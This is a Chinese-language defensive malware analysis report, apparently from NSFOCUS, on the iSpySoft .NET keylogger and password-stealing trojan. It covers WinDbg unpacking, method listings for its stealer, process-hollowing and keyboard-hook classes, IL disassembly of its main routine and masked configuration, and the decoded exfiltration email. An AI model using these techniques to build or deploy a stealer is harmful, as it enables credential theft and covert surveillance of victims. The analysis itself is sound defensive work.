iSpySoft木马分析

iSpySoft木马样本文件使用 .Net语言编写，对其原始代码使用加密混淆器（ConfuserEx v0.6.0）进行了加密混淆，加大了逆向分析的难度。

]1 加密混淆代码

使用 windbg 尝试进行脱壳，第一步定位解密后加载到内存中的可执行模块，通过调试分析发现程序运行后内存中会加载 stub 模块；

0:000> !CLRStackPDBsymbolfor mscorwks.dllnot loadedOSThreadId: 0xa68 (0)ESPEIP003ae488 773eb727 [HelperMethodFrame: 003ae488]003ae52c 6e4b8496 System.IO.Path.CheckInvalidPathChars(System.String)*** WARNING: Unableto verifychecksum  forC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll003ae538 6dd92736 System.IO.Path.NormalizePathFast(System.String, Boolean)003ae5bc 6dd926c5 System.IO.Path.NormalizePath(System.String, Boolean)@NSFOCUS 2016  http://www.nsfocus.com 003ae5cc 6dd92686 System.IO.Path.GetFullPathInternal(System.String) 003ae5d8 6dd39448 System.Reflection.Module.get_FullyQualifiedName() 003ae608 00626996 .        )(         003ae694 00626739 ..cctor() 003ae8a4 6e671b4c [GCFrame: 003ae8a4] 003aef8c 6e671b4c [GCFrame: 003aef8c] 003af170  6e671b4c  [HelperMethodFrame_1OBJ:  003af170] System.RuntimeMethodHandle._InvokeMethodFast(System.Object,  System.Object[], System.SignatureStructByRef, System.Reflection.MethodAttributes, System.RuntimeTypeHandle) 003af1e0 6dd85458 System.RuntimeMethodHandle.InvokeMethodFast(System.Object, System.Object[], System.Signature, System.Reflection.MethodAttributes, System.RuntimeTypeHandle) 003af230  6dd85206  System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags,  System.Reflection.Binder,  System.Object[], System.Globalization.CultureInfo, Boolean) 003af26c  6dd850ee  System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags,  System.Reflection.Binder,  System.Object[], System.Globalization.CultureInfo) 003af28c 006266f7  .                     (System.Reflection.MethodInfo, System.String[], Boolean)   003af2a8 00624512  .                      (System.String[])   003af504 6e671b4c [GCFrame: 003af504] 

定位查看stub模块信息，发现其为完整PE文件，dump完整PE文件；

0:000> !Name2EE *!stubModule: 6db71000 (mscorlib.dll)--------------------------------------Module: 00262360 (sortkey.nlp)--------------------------------------Module: 00262010 (sorttbls.nlp)--------------------------------------Module: 002626b0 (prcp.nlp)--------------------------------------Module: 00262a00 (mscorlib.resources.dll)--------------------------------------Module: 001c2ff8 (GCL-05 DetailedPackingList.exe)--------------------------------------Module: 6c661000 (System.Windows.Forms.dll)--------------------------------------Module: 6d3d1000 (System.dll)--------------------------------------Module: 6d241000 (System.Drawing.dll)--------------------------------------Module: 001c71c0 (stub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)0:000> !DumpModule 001c71c0Name: stub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null@NSFOCUS 2016  http://www.nsfocus.comAttributes: PEFileAssembly: 00494878LoaderHeap: 00000000TypeDefToMethodTableMap: 00a03de8TypeRefToMethodTableMap: 00a03ef8MethodDefToDescMap: 00a04090FieldDefToDescMap: 00a04688MemberRefToDescMap: 00a04b14FileReferencesMap: 00a04e50AssemblyReferencesMap: 00a04e54MetaDatastartaddress: 005f53ec (97120 bytes)

查看 stub.exe 代码，发现其代码已经进行了解密，可以清楚的看到程序的代码结构，其代码还存在混淆效果，提取的完整 PE 文件可直接运行，且其行为与原始样本相同；

]2 解密后代码结构

提取加载资源 UmbGctGTGGWnIGiBIgLVRjpHMdEi.dll；查看提取的该模块信息，该程序的功能代码主要在该模块中定义，包括：反内存 dump，反沙箱，执行命令，下载文件，注入进程，自保护，监控屏幕，启动配置文件等信息；

0:000> !CLRStackOSThreadId: 0xadc (0)ESPEIP0032e7ac 6d9588b6 System.Convert.ChangeType(System.Object, System.Type, System.IFormatProvider)0032e7c4 005d72a5 stub.exe!Unknown0032e80c 005d60f9 stub.exe!Unknown*** WARNING: Unableto verifychecksumfor image01260000*** ERROR: Moduleloadcompletedbutsymbolscouldnot beloadedfor image012600000032eac4 6db31b4c [GCFrame: 0032eac4]0032f068 6db31b4c [PrestubMethodFrame: 0032f068] stub.exe!Unknown0032f28c 6db31b4c [GCFrame: 0032f28c]0:000> !Name2EE *!UmbGctGTGGWnIGiBIgLVRjpHMdEiModule: 6d031000 (mscorlib.dll)--------------------------------------Module: 00192360 (sortkey.nlp)--------------------------------------@NSFOCUS 2016  http://www.nsfocus.comModule: 00192010 (sorttbls.nlp)--------------------------------------Module: 001926b0 (prcp.nlp)--------------------------------------Module: 00192a00 (mscorlib.resources.dll)--------------------------------------Module: 00172ff8 (stub.exe)--------------------------------------Module:  001745a4  (UmbGctGTGGWnIGiBIgLVRjpHMdEi,  Version=0.0.0.0,  Culture=neutral,PublicKeyToken=null)--------------------------------------Module: 6c831000 (System.dll)0:000> !DumpModule 001745a4Name: UmbGctGTGGWnIGiBIgLVRjpHMdEi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=nullAttributes: PEFileAssembly: 00686338LoaderHeap: 00000000TypeDefToMethodTableMap: 0022405cTypeRefToMethodTableMap: 00224064MethodDefToDescMap: 00224068FieldDefToDescMap: 0022406cMemberRefToDescMap: 00224070FileReferencesMap: 00224078AssemblyReferencesMap: 0022407cMetaDatastartaddress: 00443238 (284 bytes)@NSFOCUS 2016  http://www.nsfocus.com

]3 功能模块

由于 stub.exe 被进行代码混淆处理，使用 windbg 直接调试 stub.exe 进行混淆代码反混淆处理，通过查看程序运行堆栈信息，可以确程序在是否进行代码还原完毕；

ESPEIP0036ea5c  77e6f8c1  [NDirectMethodFrameStandalone:  0036ea5c]System.Net.UnsafeNclNativeMethods+OSSOCK.WSAConnect(IntPtr, Byte[], Int32, IntPtr, IntPtr, IntPtr,IntPtr)0036ea80  6c97228a  System.Net.Sockets.Socket.DoConnect(System.Net.EndPoint,System.Net.SocketAddress)***  WARNING:  Unable  to  verify  checksum  forC:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll0036eaa0 6c959144 System.Net.Sockets.Socket.InternalConnect(System.Net.EndPoint)0036eab0 6c9515f1 System.Net.ServicePoint.ConnectSocketInternal(Boolean, System.Net.Sockets.Socket,System.Net.Sockets.Socket,  System.Net.Sockets.Socket  ByRef,  System.Net.IPAddress  ByRef,ConnectSocketState, System.IAsyncResult, Int32, System.ExceptionByRef)0036eb14  6c9514f9  System.Net.ServicePoint.ConnectSocket(System.Net.Sockets.Socket,System.Net.Sockets.Socket,  System.Net.Sockets.Socket  ByRef,  System.Net.IPAddress  ByRef,ConnectSocketState, Int32, System.ExceptionByRef)0036eb3c 6c95147c System.Net.ServicePoint.GetConnection(System.Net.PooledStream, System.Object,Boolean, System.Net.IPAddressByRef, System.Net.Sockets.SocketByRef, System.Net.Sockets.SocketByRef,Int32)0036eb7c  6c95135c  System.Net.PooledStream.Activate(System.Object,  Boolean,  Int32,@NSFOCUS 2016  http://www.nsfocus.com System.Net.GeneralAsyncDelegate) 0036ebb8  6c95116a  System.Net.Connection.CompleteStartConnection(Boolean, System.Net.HttpWebRequest) 0036ec00  6c97978a  System.Net.Connection.CompleteStartRequest(Boolean, System.Net.HttpWebRequest, System.Net.TriState) 0036ec30 6c9790d3 System.Net.Connection.SubmitRequest(System.Net.HttpWebRequest) 0036ec74 6c978a2c System.Net.ServicePoint.SubmitRequest(System.Net.HttpWebRequest, System.String) 0036ecac 6c9782f9 System.Net.HttpWebRequest.SubmitRequest(System.Net.ServicePoint) 0036ecd8 6ce9de54 System.Net.HttpWebRequest.GetResponse() 0036ed18 6cce6db0 System.Net.WebClient.GetWebResponse(System.Net.WebRequest) 0036ed24 6cce87cb System.Net.WebClient.DownloadBits(System.Net.WebRequest, System.IO.Stream, System.Net.CompletionDelegate, System.ComponentModel.AsyncOperation) 0036ed48 6cce6b53 System.Net.WebClient.DownloadDataInternal(System.Uri, System.Net.WebRequest ByRef) 0036ed78 6cce7e43 System.Net.WebClient.DownloadString(System.Uri) 0036edac 6cce7dc6 System.Net.WebClient.DownloadString(System.String) 0036edb8 00622a19 Technitium.ComputerInformation.GetExternalIP() 0036ee04 00621b1b Technitium.ComputerInformation.GetInformation() 0036ef1c 00620ca6 Technitium.Core.FileExecuted() 0036f124 0062057c Technitium.Main.main() 0036f3c8 6db31b4c [GCFrame: 0036f3c8] 

]4 获取外网 IP

通过上述脱壳反混淆处理后，提取该样本原始程序核心代码，进行代码分析，其代码中主要包含以下几个核心功能类：Technitium.Main、Technitium.Core、Technitium.RunPEx、Technitium.Config、Technitium.Stealer 等，下面是上述类的详细信息；

# Technitium.Config1:006> !dumpmt -md 00183c64EEClass: 00371b0cModule: 00182ff8Name: Technitium.ConfigmdToken: 0200003a (C:\Users\bassx\Desktop\stub.exe)BaseSize: 0xcComponentSize: 0x0NumberofIFacesin IFaceMap: 0Slotsin VTable: 7--------------------------------------MethodDescTableEntryMethodDescJITName6d1f6a90 6d07494c PreJITSystem.Object.ToString()@NSFOCUS 2016  http://www.nsfocus.com 6d1f6ab0 6d074954 PreJITSystem.Object.Equals(System.Object) 6d1f6b20 6d074984 PreJITSystem.Object.GetHashCode() 6d267540 6d0749a8 PreJITSystem.Object.Finalize() 00620108 00183c48 JITTechnitium.Config..cctor() 0018c10d 00183c50 NONETechnitium.Config..ctor() 0018c111 00183c58 NONETechnitium.Config.DumpErrorLog(System.Exception, System.String) # Technitium.Stealer 1:006> !dumpmt -md 00188760 EEClass: 003764e8 Module: 00182ff8 Name: Technitium.Stealer mdToken: 02000022 (C:\Users\bassx\Desktop\stub.exe) BaseSize: 0xc ComponentSize: 0x0 NumberofIFacesin IFaceMap: 0 Slotsin VTable: 13 -------------------------------------- MethodDescTable EntryMethodDescJITName 6d1f6a90 6d07494c PreJITSystem.Object.ToString() 6d1f6ab0 6d074954 PreJITSystem.Object.Equals(System.Object) 6d1f6b20 6d074984 PreJITSystem.Object.GetHashCode() 6d267540 6d0749a8 PreJITSystem.Object.Finalize() 0018c4b5 001886f8 NONETechnitium.Stealer..ctor() 00623918 00188700 JITTechnitium.Stealer.Recover() 0018c4bd 0018870c NONETechnitium.Stealer.MSParseLogs(System.String) 0018c4c1 00188718 NONETechnitium.Stealer.OSParseLogs(System.String) 0018c4c5 00188724 NONETechnitium.Stealer.MLParseLogs(System.String) 0018c4c9 00188730 NONETechnitium.Stealer.WBParseLogs(System.String) 0018c4cd 0018873c NONETechnitium.Stealer.WaitUntilFileIsAvailable(System.String) 00624080 00188748 JITTechnitium.Stealer.Decompress(Byte[]) 00623fd0 00188754 JITTechnitium.Stealer.Cloud(System.String) # Technitium.RunPEx 1:006> !dumpmt -md 00188c2c EEClass: 0037688c Module: 00182ff8 Name: Technitium.RunPEx mdToken: 02000040 (C:\Users\bassx\Desktop\stub.exe) BaseSize: 0xc ComponentSize: 0x0 NumberofIFacesin IFaceMap: 0 Slotsin VTable: 15 -------------------------------------- MethodDescTable @NSFOCUS 2016  http://www.nsfocus.com EntryMethodDescJITName 6d1f6a90 6d07494c PreJITSystem.Object.ToString() 6d1f6ab0 6d074954 PreJITSystem.Object.Equals(System.Object) 6d1f6b20 6d074984 PreJITSystem.Object.GetHashCode() 6d267540 6d0749a8 PreJITSystem.Object.Finalize() 0018c60d 00188aac NONETechnitium.RunPEx..ctor() 0018c64c 00188ab4 NONETechnitium.RunPEx.CreateProcess(System.String, System.String, IntPtr,  IntPtr,  Boolean,  UInt32,  IntPtr,  System.String,  STARTUP_INFORMATION  ByRef, PROCESS_INFORMATIONByRef) 0018c658 00188ad8 NONETechnitium.RunPEx.GetThreadContext(IntPtr, Int32[]) 0018c694 00188afc NONETechnitium.RunPEx.SetThreadContext(IntPtr, Int32[]) 0018c664 00188b20 NONETechnitium.RunPEx.ReadProcessMemory(IntPtr, Int32, Int32ByRef, Int32, Int32ByRef) 0018c688 00188b44 NONETechnitium.RunPEx.WriteProcessMemory(IntPtr, Int32, Byte[], Int32, Int32ByRef) 0018c670 00188b68 NONETechnitium.RunPEx.NtUnmapViewOfSection(IntPtr, Int32) 0018c67c 00188b8c NONETechnitium.RunPEx.VirtualAllocEx(IntPtr, Int32, Int32, Int32, Int32) 0018c6a0 00188bb0 NONETechnitium.RunPEx.ResumeThread(IntPtr) 006241d0 00188bd4 JITTechnitium.RunPEx.Run(System.String, System.String, Byte[], Boolean, Boolean) 00624270 00188be0 JITTechnitium.RunPEx.HandleRun(System.String, System.String, Byte[], Boolean, Boolean) # Technitium.Main 1:006> !dumpmt -md 001838dc EEClass: 003715cc Module: 00182ff8 Name: Technitium.Main mdToken: 02000002 (C:\Users\bassx\Desktop\stub.exe) BaseSize: 0xc ComponentSize: 0x0 NumberofIFacesin IFaceMap: 0 Slotsin VTable: 25 -------------------------------------- MethodDescTable EntryMethodDescJITName 6d1f6a90 6d07494c PreJITSystem.Object.ToString() 6d1f6ab0 6d074954 PreJITSystem.Object.Equals(System.Object) 6d1f6b20 6d074984 PreJITSystem.Object.GetHashCode() 6d267540 6d0749a8 PreJITSystem.Object.Finalize() 00620070 001836e4 JITTechnitium.Main..cctor() 00620440 001836ec JITTechnitium.Main.main() 0018c079 001836f8 NONETechnitium.Main.ProProtect() 0018c07d 00183704 NONETechnitium.Main.Disablers() 0018c081 00183710 NONETechnitium.Main.AV() @NSFOCUS 2016  http://www.nsfocus.com 0018c085 0018371c NONETechnitium.Main.Bot() 0018c089 00183728 NONETechnitium.Main.ProcessP() 0018c08d 00183734 NONETechnitium.Main.SendLogs() 0018c091 00183740 NONETechnitium.Main.UnhookWindowsHookEx(Int32) 0018c095 00183764 NONETechnitium.Main.SetWindowsHookEx(Int32, KeyboardHookDelegate, Int32, Int32) 0018c099 00183788 NONETechnitium.Main.GetAsyncKeyState(Int32) 0018c09d  001837ac  NONETechnitium.Main.CallNextHookEx(Int32, Int32, Int32, KBDLLHOOKSTRUCT) 0018c0a1 001837d0 NONETechnitium.Main.lineSetAppSpecific(Int64, Int64) 0018c0a5 001837f4 NONETechnitium.Main.MgmGetNextMfeStats(IntPtrByRef, Int64ByRef, System.String ByRef, Int64ByRef) 0018c0a9 00183818 NONETechnitium.Main.GetForegroundWindow() 0018c0ad 0018383c NONETechnitium.Main.GetWindowText(Int32, System.String ByRef, Int32) 0018c0b1 00183860 NONETechnitium.Main.GetActiveWindowTitle() 0018c0b5 0018386c NONETechnitium.Main.Hooked() 0018c0b9 00183878 NONETechnitium.Main.HookKeyboard() 0018c0bd 00183884 NONETechnitium.Main.UnhookKeyboard() 0018c0c1 00183890 NONETechnitium.Main.KeyboardCallback(Int32, Int32, KBDLLHOOKSTRUCT ByRef) # Technitium.Core 1:006> !dumpmt -md 001849e0 EEClass: 00371d0c Module: 00182ff8 Name: Technitium.Core mdToken: 0200003b (C:\Users\bassx\Desktop\stub.exe) BaseSize: 0xc ComponentSize: 0x0 NumberofIFacesin IFaceMap: 0 Slotsin VTable: 23 -------------------------------------- MethodDescTable EntryMethodDescJITName 6d1f6a90 6d07494c PreJITSystem.Object.ToString() 6d1f6ab0 6d074954 PreJITSystem.Object.Equals(System.Object) 6d1f6b20 6d074984 PreJITSystem.Object.GetHashCode() 6d267540 6d0749a8 PreJITSystem.Object.Finalize() 0018c141 001848b0 NONETechnitium.Core..ctor() 0018c145 001848b8 NONETechnitium.Core.CreateAPI(System.String, System.String) 0018c149 001848cc NONETechnitium.Core.CallAPI(System.String, System.String, System.Type[], System.Object[]) 0018c14d 001848e0 NONETechnitium.Core.GetInstallPath() 0018c151 001848ec NONETechnitium.Core.IsAdmin() 0018c155 001848f8 NONETechnitium.Core.RecoverPasswords() @NSFOCUS 2016  http://www.nsfocus.com 00620740 00184904 JITTechnitium.Core.Decrypt() 0018c15d 00184910 NONETechnitium.Core.DeleteSavedPasswords() 0018c161 0018491c NONETechnitium.Core.UploadScreenshot() 0018c165 00184928 NONETechnitium.Core.GenerateHWID() 0018c169 00184934 NONETechnitium.Core.MD5(System.String) 0018c16d 00184940 NONETechnitium.Core.GetVolumeInformationA(System.String ByRef, System.String ByRef, UInt32, UInt32ByRef, UInt32ByRef, UInt32ByRef, System.String ByRef, UInt32) 0018c171 00184964 NONETechnitium.Core.HidD_GetHidGuid(System.GuidByRef) 00620bd8 00184988 JITTechnitium.Core.FileExecuted() 0018c179 00184994 NONETechnitium.Core.Install() 0018c17d 001849a0 NONETechnitium.Core.IsConnectedToInternet() 0018c181 001849ac NONETechnitium.Core.Startup(System.Object) 0018c185 001849b8 NONETechnitium.Core.FakeMessage() 0018c189 001849c4 NONETechnitium.Core.Upload(System.String, System.String, System.String) 

0x01 功能分析

iSpySoft 木马实现了多种功能，包括：窃取用户信息、浏览器信息(登录用户名密码)、键盘监控、截屏、视频监控、文件下载、文件上传、远程控制等功能。

]5 主模块功能

下面是对其主功能函数的分析， 主函数执行的功能主要依赖于其配置信息， 通过对其配置选项执行相应的功能函数；

# Technitium.Main.main() 主功能函数1:006> !dumpil 001836ecilAddr = 004020a4IL_0000: nop.try{IL_0001: nopIL_0002: ldsfldTechnitium.Config::DELAY_EXECUTION # 读取配置参数IL_0007: callSystem.Convert::ToInt32IL_000c: ldc.i4 1000IL_0011: mul.ovfIL_0012: callSystem.Threading.Thread::Sleep@NSFOCUS 2016  http://www.nsfocus.comIL_0017: nopIL_0018: ldsfldTechnitium.Config::ANTI_windowS # 读取配置参数IL_001d: callSystem.String::IsNullOrEmptyIL_0022: ldc.i4.0IL_0023: ceqIL_0025: stloc.1IL_0026: ldloc.1IL_0027: brfalse.s IL_0030IL_0029: newobjAntiwindow::.ctorIL_002e: stloc.2IL_002f: nopIL_0030: nopIL_0031: ldc.i4.0IL_0032: stloc.0IL_0033: nopIL_0034: ldc.i4.1IL_0035: ldsfldTechnitium.Config::MUTEXIL_003a: ldloca.s VAR OR ARG 0IL_003c: newobjSystem.Threading.Mutex::.ctorIL_0041: stloc.3.try{IL_0042: ldloc.0IL_0043: stloc.s VAR OR ARG 4IL_0045: ldloc.s VAR OR ARG 4IL_0047: brfalseIL_010eIL_004c: callTechnitium.Core::DecryptIL_0051: nopIL_0052: ldsfldTechnitium.Config::INSTALL_FILE # 读取配置参数IL_0057: callSystem.String::IsNullOrEmptyIL_005c: ldc.i4.0IL_005d: ceqIL_005f: stloc.s VAR OR ARG 5IL_0061: ldloc.s VAR OR ARG 5IL_0063: brfalse.s IL_006cIL_0065: callTechnitium.Core::InstallIL_006a: nopIL_006b: nopIL_006c: nopIL_006d: callTechnitium.Core::FileExecutedIL_0072: nopIL_0073: ldsfldTechnitium.Config::KEYSTROKES # 读取配置参数IL_0078: callSystem.String::IsNullOrEmptyIL_007d: ldc.i4.0@NSFOCUS 2016  http://www.nsfocus.comIL_007e: ceqIL_0080: stloc.s VAR OR ARG 6IL_0082: ldloc.s VAR OR ARG 6IL_0084: brfalse.s IL_00cbIL_0086: ldstr "..[--- Window: "IL_008b: stsfldTechnitium.Main::LHeaderIL_0090: ldstr " ---].."IL_0095: stsfldTechnitium.Main::RHeaderIL_009a: callTechnitium.Main::HookKeyboardIL_009f: nopIL_00a0: ldc.i4.1IL_00a1: stsfldTechnitium.Main::UseCapsIL_00a6: ldnullIL_00a7: ldftnTechnitium.Main::SendLogsIL_00ad: newobjSystem.Threading.ThreadStart::.ctorIL_00b2: newobjSystem.Threading.Thread::.ctorIL_00b7: stloc.s VAR OR ARG 7IL_00b9: ldloc.s VAR OR ARG 7IL_00bb: ldc.i4.0IL_00bc: callvirtSystem.Threading.Thread::SetApartmentStateIL_00c1: nopIL_00c2: ldloc.s VAR OR ARG 7IL_00c4: callvirtSystem.Threading.Thread::StartIL_00c9: nopIL_00ca: nopIL_00cb: nopIL_00cc: callTechnitium.Main::DisablersIL_00d1: nopIL_00d2: callTechnitium.Main::AVIL_00d7: nopIL_00d8: callTechnitium.Main::BotIL_00dd: nopIL_00de: callTechnitium.Main::ProProtectIL_00e3: nopIL_00e4: ldsfldTechnitium.Config::RUNESCAPE_PINLOGGER # 读取配置参数IL_00e9: callSystem.String::IsNullOrEmptyIL_00ee: ldc.i4.0IL_00ef: ceqIL_00f1: stloc.s VAR OR ARG 8IL_00f3: ldloc.s VAR OR ARG 8IL_00f5: brfalse.s IL_010aIL_00f7: ldnullIL_00f8: ldftnTechnitium.Pinlogger::LogIL_00fe: newobjSystem.Threading.WaitCallback::.ctor@NSFOCUS 2016  http://www.nsfocus.comIL_0103: callSystem.Threading.ThreadPool::QueueUserWorkItemIL_0108: popIL_0109: nopIL_010a: nopIL_010b: nopIL_010c: br.s IL_0117IL_010e: nopIL_010f: ldc.i4.0IL_0110: callSystem.Environment::ExitIL_0115: nopIL_0116: nopIL_0117: leave.s IL_0125} // end .try.finally{IL_0119: nopIL_011a: ldloc.3IL_011b: brfalse.s IL_0124IL_011d: ldloc.3IL_011e: callvirtSystem.IDisposable::DisposeIL_0123: nopIL_0124: endfinally} // end .finallyIL_0125: callSystem.Diagnostics.Process::GetCurrentProcessIL_012a: callvirtSystem.Diagnostics.Process::WaitForExitIL_012f: nopIL_0130: leave.s IL_0151} // end .try.catch{IL_0132: dupIL_0133: callMicrosoft.VisualBasic.CompilerServices.ProjectDat::SetProjectErrorIL_0138: stloc.s VAR OR ARG 9IL_013a: nopIL_013b: ldloc.s VAR OR ARG 9IL_013d: callvirtSystem.Exception::ToStringIL_0142: ldc.i4.0IL_0143: ldnullIL_0144: callMicrosoft.VisualBasic.Interaction::MsgBoxIL_0149: popIL_014a: callMicrosoft.VisualBasic.CompilerServices.ProjectDat::ClearProjectErrorIL_014f: leave.s IL_0151} // end .catchIL_0151: nop@NSFOCUS 2016  http://www.nsfocus.comIL_0152: ret

iSpySoft 木马主要配置文件：

# Technitium.Config..cctor() 配置文件1:006> !dumpil 00183c48ilAddr = 00407b3cIL_0000: ldstr "1.0.0.0"IL_0005: stsfldTechnitium.Config::VERSION # 版本IL_000a: ldstr "AF7B1841C6A70C858E3201422E2D0BEA"IL_000f: stsfldTechnitium.Config::HWID # HWIDIL_0014: ldstr "149ff47a-7df2-4b42-823e-2820d63034b4"IL_0019: stsfldTechnitium.Config::MUTEX # iSpy MUTEXIL_001e: ldstr "EMAIL"IL_0023: stsfldTechnitium.Config::UPLOAD_METHOD # 上传文件方式， 提供三种 EMAIL， FTP，PHPIL_0028: ldstr "XXXXXXXXXXXXXXX"IL_002d: stsfldTechnitium.Config::EMAIL_USERNAME # EMAIL 用户名IL_0032: ldstr "XXXXXXXXXXXXXXX"IL_0037: stsfldTechnitium.Config::EMAIL_PASSWORD # EMAIL 密码IL_003c: ldstr "XXXXXXXXXXXXXXX"IL_0041: stsfldTechnitium.Config::EMAIL_PORT # EMAIL 端口IL_0046: ldstr "XXXXXXXXXXXXXXX"IL_004b: stsfldTechnitium.Config::EMAIL_SERVER # EMAIL 服务器IL_0050: ldstr ""IL_0055: stsfldTechnitium.Config::EMAIL_SSL # 是否开发 SSLIL_005a: ldstr "XXXXXXXXXXXXXXX"IL_005f: stsfldTechnitium.Config::FTP_USERNAME # Ftp 用户名IL_0064: ldstr "XXXXXXXXXXXXXXX"IL_0069: stsfldTechnitium.Config::FTP_PASSWORD # Ftp 密码IL_006e: ldstr "XXXXXXXXXXXXXXX"IL_0073: stsfldTechnitium.Config::FTP_SERVER # Ftp 服务器IL_0078: ldstr "XXXXXXXXXXXXXXX"IL_007d: stsfldTechnitium.Config::PHP_KEY # PHP keyIL_0082: ldstr "XXXXXXXXXXXXXXX"IL_0087: stsfldTechnitium.Config::WEBPANEL # PHP PanelIL_008c: ldstr "10"IL_0091: stsfldTechnitium.Config::LOG_INTERVALIL_0096: ldstr ""IL_009b: stsfldTechnitium.Config::CLIPBOARD_MONITORING # 监控剪切板IL_00a0: ldstr ""IL_00a5: stsfldTechnitium.Config::SEND_SCREENSHOTS # 发送截屏信息IL_00aa: ldstr ""IL_00af: stsfldTechnitium.Config::KEYSTROKES # 进行按键监控IL_00b4: ldstr ""@NSFOCUS 2016  http://www.nsfocus.comIL_00b9: stsfldTechnitium.Config::WEBCAM_LOGGER # 摄像头监控IL_00be: ldstr ""IL_00c3: stsfldTechnitium.Config::MODIFY_TASK_MANAGER # 禁用任务管理器IL_00c8: ldstr ""IL_00cd: stsfldTechnitium.Config::ANTI_windowS # 检测调试器IL_00d2: ldstr ""IL_00d7: stsfldTechnitium.Config::PROCESS_PROTECTION # 程序自保护IL_00dc: ldstr ""IL_00e1: stsfldTechnitium.Config::RUNESCAPE_PINLOGGERIL_00e6: ldstr ""IL_00eb: stsfldTechnitium.Config::CLEAR_SAVEDIL_00f0: ldstr "2a76d583-f7dc-4bb6-88eb-6515438f2ee7"IL_00f5: stsfldTechnitium.Config::PASSWORD_STEALER # 窃取密码IL_00fa: ldstr ""IL_00ff: stsfldTechnitium.Config::MELT_FILEIL_0104: ldstr ""IL_0109: stsfldTechnitium.Config::INSTALL_FILE # 安装文件IL_010e: ldstr "[PATHTYPE]"IL_0113: stsfldTechnitium.Config::PATH_TYPE # 安装路径IL_0118: ldstr "[FOLDER]"IL_011d: stsfldTechnitium.Config::FOLDER_NAME # 安装文件夹名称IL_0122: ldstr "[FILENAME]"IL_0127: stsfldTechnitium.Config::FILE_NAME # 安装文件名称IL_012c: ldstr ""IL_0131: stsfldTechnitium.Config::HKCU # 注册表配置 1IL_0136: ldstr ""IL_013b: stsfldTechnitium.Config::HKLM # 注册表配置 2IL_0140: ldstr ""IL_0145: stsfldTechnitium.Config::BINDER # 绑定端口IL_014a: ldstr ""IL_014f: stsfldTechnitium.Config::VISIT_WEBSITE # 访问网站IL_0154: ldstr ""IL_0159: stsfldTechnitium.Config::BLOCKER_WEBSITE # 阻断网站IL_015e: ldstr ""IL_0163: stsfldTechnitium.Config::REGISTRY_PERSISTENCEIL_0168: ldstr ""IL_016d: stsfldTechnitium.Config::HIDE_FILE # 隐藏文件IL_0172: ldstr ""IL_0177: stsfldTechnitium.Config::DOWNLOAD_FILE # 下载文件IL_017c: ldstr ""IL_0181: stsfldTechnitium.Config::DOWNLOAD_FILE_TYPE # 下载文件类型IL_0186: ldstr ""IL_018b: stsfldTechnitium.Config::MESSAGE_TYPE # 消息类型定义IL_0190: ldstr "[MTITLE]"@NSFOCUS 2016  http://www.nsfocus.comIL_0195: stsfldTechnitium.Config::MESSAGE_TITLE # 消息头定义IL_019a: ldstr "[MBODY]"IL_019f: stsfldTechnitium.Config::MESSAGE_BODY # 消息内容定义IL_01a4: ldstr ""IL_01a9: stsfldTechnitium.Config::DISABLERS # 禁用系统功能 cmdIL_01ae: ldstr ""IL_01b3: stsfldTechnitium.Config::BOT_KILLER # 关闭 Bot 功能IL_01b8: ldstr ""IL_01bd: stsfldTechnitium.Config::ANTIVIRUS_KILLER # 关闭杀毒软件IL_01c2: ldstr "0"IL_01c7: stsfldTechnitium.Config::DELAY_EXECUTION # 延迟执行IL_01cc: ret

]6 窃取密码

通过对该木马中的配置文件分析，其主要功能是实现密码窃取(其他功能项未配置)，并且配置实用 EMAIL 方式上传收集到的用户密码信息。

0x02 窃取密码

通过邮件方式窃取收集到的用户密码信息:

]7 Wireshark 抓包

从获取的网络数据包看出内容是经过 base64 编码的，将其解码后内容如下：

DeariSpyKeyloggerCustomers,LetusinformedyouthatiSpyKeyloggeris currentlyactivenow.BestRegardsiSpySoftAdmin*********** ComputerInformation ***********Username: WIN-86JN3PJSB51WindowsInstalled: MicrosoftWindows 7 家庭普通版LocalDate & Time: 2016/4/22 16:13:13InstalledLanguage: zh-CN.NETFrameworkInstalled: 2, 4SystemPrivileges: UserDefault Browser: Not found!InstalledAnti-Virus:InstalledFirewall:InternalIP: 192.168.78.130ExternalIP:*********** ComputerInformation ***********

]8 攻击者邮箱

0x03 样本跟踪

iSpySoft木马最早被出现于2016年1月27日，发展至今，其木马功能强大，最新版的程序使用 ConfuserEx v0.6.0 加密混淆器对其代码进行了处理。

0x04 行为分析

0x05 攻击目标定位

0x06 系统检测